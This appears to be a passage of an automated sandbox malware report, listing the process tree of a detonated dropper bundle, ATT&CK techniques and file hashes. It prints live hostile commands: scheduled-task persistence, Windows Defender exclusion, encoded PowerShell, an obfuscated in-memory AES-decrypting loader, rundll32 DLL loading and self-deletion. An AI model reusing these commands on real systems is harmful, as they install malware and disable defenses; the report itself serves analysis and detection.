- Program crash
PID:11072

C:\Program Files\Internet Explorer\ZBQOJIFRJS\poweroff.exe
"C:\Program Files\Internet Explorer\ZBQOJIFRJS\poweroff.exe" /VERYSILENT
11⤵
PID:9916

C:\Users\Admin\AppData\Local\Temp\is-VV2EF.tmp\poweroff.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VV2EF.tmp\poweroff.tmp" /SL5="$8025A,490199,350720,C:\Program Files\Internet Explorer\ZBQOJIFRJS\poweroff.exe" /VERYSILENT
12⤵
PID:9960

C:\Program Files (x86)\powerOff\Power Off.exe
"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu
13⤵
PID:10016

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:183272

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:183292

C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"
6⤵
- Executes dropped EXE
PID:1360

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4464

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
7⤵
PID:3140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
8⤵
PID:3848

C:\Program Files (x86)\Installoid\installoid.exe
"C:\Program Files (x86)\Installoid\installoid.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:4796

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
8⤵
PID:2620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
9⤵
PID:4376

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4040

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe" -hq
7⤵
- Executes dropped EXE
PID:56988

C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe"
6⤵
- Executes dropped EXE
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 1820
7⤵
- Program crash
PID:8532

C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5008

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~4.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~4.EXE
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:247988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
8⤵
PID:319432

C:\Users\Admin\AppData\Local\Temp\Qzjfjhwisedatarecoveryportable_6_1_22.exe
"C:\Users\Admin\AppData\Local\Temp\Qzjfjhwisedatarecoveryportable_6_1_22.exe"
8⤵
PID:11080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
9⤵
PID:11464

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
8⤵
PID:11288

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1980

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"
7⤵
- Executes dropped EXE
PID:172936

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"
7⤵
- Executes dropped EXE
PID:248112

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"
7⤵
- Executes dropped EXE
PID:283080

C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3448

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:318876

C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe"
6⤵
- Executes dropped EXE
PID:1244

C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4460

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:287544

C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe"
6⤵
- Executes dropped EXE
PID:3680

C:\Users\Admin\AppData\Roaming\instal.exe
C:\Users\Admin\AppData\Roaming\instal.exe
7⤵
- Executes dropped EXE
PID:5156

C:\Users\Admin\AppData\Roaming\yaeblan_v0.7b_2133_windows_64.exe
C:\Users\Admin\AppData\Roaming\yaeblan_v0.7b_2133_windows_64.exe
7⤵
- Executes dropped EXE
PID:5100

C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe"
6⤵
- Executes dropped EXE
PID:4692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 264
7⤵
- Program crash
PID:5228

C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"
6⤵
- Executes dropped EXE
PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 264
7⤵
- Program crash
PID:41132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 772
7⤵
- Program crash
PID:287660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 764
7⤵
- Program crash
PID:249312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 812
7⤵
- Program crash
PID:5956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 820
7⤵
- Program crash
PID:6616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 824
7⤵
- Program crash
PID:7276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 800
7⤵
- Program crash
PID:7960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1360
7⤵
- Program crash
PID:8732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Mixruzki1.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe" & exit
7⤵
PID:9044

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Mixruzki1.bmp.exe" /f
8⤵
- Kills process with taskkill
PID:9232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1472
7⤵
- Program crash
PID:9164

C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2764

C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe"
6⤵
- Executes dropped EXE
PID:116

C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe"
6⤵
- Executes dropped EXE
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 1156
7⤵
- Program crash
PID:8308

C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe"
6⤵
- Executes dropped EXE
PID:2624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 608
4⤵
- Program crash
PID:892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue078a285ef7.exe /mixone
4⤵
PID:1392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3496 -ip 3496
1⤵
PID:2028

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
Tue078a285ef7.exe /mixone
1⤵
- Executes dropped EXE
PID:4132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 620
2⤵
- Program crash
PID:3704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 644
2⤵
- Program crash
PID:4112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 620
2⤵
- Program crash
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 584
2⤵
- Program crash
PID:4028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 828
2⤵
- Program crash
PID:2356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 868
2⤵
- Program crash
PID:3236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1068
2⤵
- Program crash
PID:5008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1068
2⤵
- Program crash
PID:4464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1288
2⤵
- Program crash
PID:4136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 848
2⤵
- Program crash
PID:11556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3852 -ip 3852
1⤵
PID:2180

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4896

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 600
3⤵
- Program crash
PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4132 -ip 4132
1⤵
PID:4692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4736 -ip 4736
1⤵
PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4132 -ip 4132
1⤵
PID:1404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4132 -ip 4132
1⤵
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4132 -ip 4132
1⤵
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4132 -ip 4132
1⤵
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4132 -ip 4132
1⤵
PID:832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4132 -ip 4132
1⤵
PID:4028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4132 -ip 4132
1⤵
PID:4692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4132 -ip 4132
1⤵
PID:1544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4692 -ip 4692
1⤵
PID:3488

C:\Windows\SYSTEM32\cmd.exe
cmd /c HelloWord.bat
1⤵
PID:3572

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HelloWord.bat.exe
"HelloWord.bat.exe" -noprofile -executionpolicy bypass -command $Sininy = 'dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgRmVObm1iIHsgcHVibGljIHN0YXRpYyBieXRlW10gWERKalRkKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gR1JPYmdjKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9';$TThmJnNzyf=')))).Entry';$njMLfacfHE='d([FeNnmb]';$TWdyFFHpsV='$tYMOrf.Le';$puiinoPuUR='vsTFxqtvma';$LdXzmmpbbI='g]::UTF8.G';$VgmFdjtTSa='y));Add-Ty';$LcqwqMbbkB='(, [string';$XLABAnCNaC='Point.Invo';$eSVoGBqqcm='tem.Conver';$HncyZNoqMg='rt]::FromB';$dBNFtIDpED='pe -TypeDe';$pNNYCZutDT='uidcVl;[Sy';$uYiNhweZtY='DJjTd([Sys';$obIPVbiMnt='sL08gQ==''';$lBqjUwIWqJ='88RXWjAUO0';$yyiadSWMup='tring(''19';$rNyVgZJHtt='''C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HelloWord.bat'').Split([Environment]::NewLine);$yYcfRx ';$FngBUvdQey='vert]::Fro';$JARBdjgpdf='ing($Sinin';$JrGPaYqkzv='6TZ/iwZae3';$oyPUjucKWH='se64String';$wJAlKnjnsl='[System.IO';$svBdAUiAtM=' [System.C';$zgADwDAhoI='[]] ('''')))';$FioTOnFZJu='GqngnkIZPv';$vQHOPGWzaK='ase64Strin';$aRAFgJMEqM='FeNnmb]::X';$oytbZiWzCc='$tYMOrf = ';$MOuhLpNOcu='mbly]::Loa';$pBWHwgrjPw='System.Con';$zGuuSjFOsl='romBase64S';$RPBdaQsiWF='stem.Conve';$hGiOUYCmhO='ngth - 1];';$ygLbciMlhu='stem.Refle';$aXQGvVLKHY='ke($null, ';$supxmarUas='xt.Encodin';$GQKzYhYCTY='ction.Asse';$udUaphWlZE='($yYcfRx),';$eVgNeLbhkq='Cor1yU3Byr';$BIxIhDruVr='o=''), [Sy';$xRblTPfDfE='adAllText(';$LbhoOkoave='.File]::Re';$zaprKuJapA='[System.Te';$gNhJMfwFyK='finition $';$BGHbwWihUF='$uidcVl = ';$mzPItvJhEv='t]::FromBa';$xAuMwgrRdz='etString([';$skxdeycnZu='::GRObgc([';$fHYHcSZDbf='mBase64Str';$HAIUrnqfnO='= $tYMOrf[';$NXuXKGdafm='onvert]::F';$WuzCaTPDPk='g(''fwpvFx';Invoke-Expression($oytbZiWzCc + $wJAlKnjnsl + $LbhoOkoave + $xRblTPfDfE + $rNyVgZJHtt + $HAIUrnqfnO + $TWdyFFHpsV + $hGiOUYCmhO + $BGHbwWihUF + $zaprKuJapA + $supxmarUas + $LdXzmmpbbI + $xAuMwgrRdz + $pBWHwgrjPw + $FngBUvdQey + $fHYHcSZDbf + $JARBdjgpdf + $VgmFdjtTSa + $dBNFtIDpED + $gNhJMfwFyK + $pNNYCZutDT + $ygLbciMlhu + $GQKzYhYCTY + $MOuhLpNOcu + $njMLfacfHE + $skxdeycnZu + $aRAFgJMEqM + $uYiNhweZtY + $eSVoGBqqcm + $mzPItvJhEv + $oyPUjucKWH + $udUaphWlZE + $svBdAUiAtM + $NXuXKGdafm + $zGuuSjFOsl + $yyiadSWMup + $lBqjUwIWqJ + $eVgNeLbhkq + $puiinoPuUR + $JrGPaYqkzv + $BIxIhDruVr + $RPBdaQsiWF + $HncyZNoqMg + $vQHOPGWzaK + $WuzCaTPDPk + $FioTOnFZJu + $obIPVbiMnt + $TThmJnNzyf + $XLABAnCNaC + $aXQGvVLKHY + $LcqwqMbbkB + $zgADwDAhoI)
2⤵
PID:7160

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yimzptac\yimzptac.cmdline"
3⤵
PID:8164

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD59.tmp" "c:\Users\Admin\AppData\Local\Temp\yimzptac\CSC7605DA9E296941508D47B9B04AE6A86E.TMP"
4⤵
PID:8592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4472 -ip 4472
1⤵
PID:13296

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:236840

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
- Loads dropped DLL
PID:239912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 239912 -s 600
3⤵
- Program crash
PID:249328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 239912 -ip 239912
1⤵
PID:248192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4472 -ip 4472
1⤵
PID:287564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 318992 -ip 318992
1⤵
PID:644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4472 -ip 4472
1⤵
PID:319324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4472 -ip 4472
1⤵
PID:5848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 318992 -ip 318992
1⤵
PID:6224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4472 -ip 4472
1⤵
PID:6576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 318992 -ip 318992
1⤵
PID:6900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4472 -ip 4472
1⤵
PID:7212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 318992 -ip 318992
1⤵
PID:7504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4472 -ip 4472
1⤵
PID:7768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4108 -ip 4108
1⤵
PID:8196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 318992 -ip 318992
1⤵
PID:8284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4368 -ip 4368
1⤵
PID:8476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4472 -ip 4472
1⤵
PID:8668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 318992 -ip 318992
1⤵
PID:8768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 318992 -ip 318992
1⤵
PID:8972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4472 -ip 4472
1⤵
PID:9084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 318992 -ip 318992
1⤵
PID:9272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 318992 -ip 318992
1⤵
PID:9388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 10312 -ip 10312
1⤵
PID:10384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10312 -ip 10312
1⤵
PID:10700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10312 -ip 10312
1⤵
PID:10824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 10312 -ip 10312
1⤵
PID:10884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10312 -ip 10312
1⤵
PID:10980

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 10916 -ip 10916
1⤵
PID:11048

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:11160

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:11196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 11196 -s 608
3⤵
- Program crash
PID:11236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 11196 -ip 11196
1⤵
PID:11216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 10312 -ip 10312
1⤵
PID:11248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10312 -ip 10312
1⤵
PID:11380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4132 -ip 4132
1⤵
PID:11524

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
ec8ff3b1ded0246437b1472c69dd1811

SHA1
d813e874c2524e3a7da6c466c67854ad16800326

SHA256
e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

SHA512
e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
57ca7a471a850ca44286b7178100217f

SHA1
be1063f106a778f03bdda03507ad0a07044b552d

SHA256
a04ca28a3d932874a9e24596d7bd988b72081741d0fc087e26fcad8f768435f8

SHA512
4637b16cde486949f2db09d209a17f8d93cff70a61c2e813e10937dfc3c6c96ba0c1548bc51b285197502a949775ab56a4c9452b1f3b01734adeadfe431003bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\3UIi17.uI
Filesize
363KB

MD5
6991612597b1769596e681d10a4b970a

SHA1
eea55ffb9cf1f44c30ae9a14aec2dd7020a5c231

SHA256
899a2d886577c8f76223486d8e0f3098526bcd30fd851071ff8e3ebe945c81c8

SHA512
aaa0c80446d6c10e4fef40038811cd65dbe8f26258d23f2b5633d1efa2eb0cd78b323b62770820aa609973c164be12de7912f0c70fabb7d35bb49c42bbf8a2af

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe
Filesize
426KB

MD5
2fa10132cfbce32a5ac7ee72c3587e8b

SHA1
30d26416cd5eef5ef56d9790aacc1272c7fba9ab

SHA256
cfb5c20ec8d95c35f7edb8743084d4491e43c62c575cf0102b4f6781c50689de

SHA512
4e9338f89229bdddb5d7c803a415a338a75962e61ef47984a67efd1e81824ac14039d9abe2b26992a30f6d26c724058518849d71b6d1948c00b08ae95b0fd25a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe
Filesize
426KB

MD5
2fa10132cfbce32a5ac7ee72c3587e8b

SHA1
30d26416cd5eef5ef56d9790aacc1272c7fba9ab

SHA256
cfb5c20ec8d95c35f7edb8743084d4491e43c62c575cf0102b4f6781c50689de

SHA512
4e9338f89229bdddb5d7c803a415a338a75962e61ef47984a67efd1e81824ac14039d9abe2b26992a30f6d26c724058518849d71b6d1948c00b08ae95b0fd25a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe
Filesize
286KB

MD5
82a9f8a4b7f7fcc967913bfeb63cfeba

SHA1
87366553ff702c334300151132ab956dbb803e5d

SHA256
59d466a488da2270d0ae53d9ad035c283a4ce08252bcfec8b65301a930875910

SHA512
bef4b52ab24d47a3c50615ce72c733485419ed84f686d48e77928a46be4ef078883351b68a446c0e9ce52c02a25945cb1d6c44cc04c1cdd5de7c66408ac75e2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe
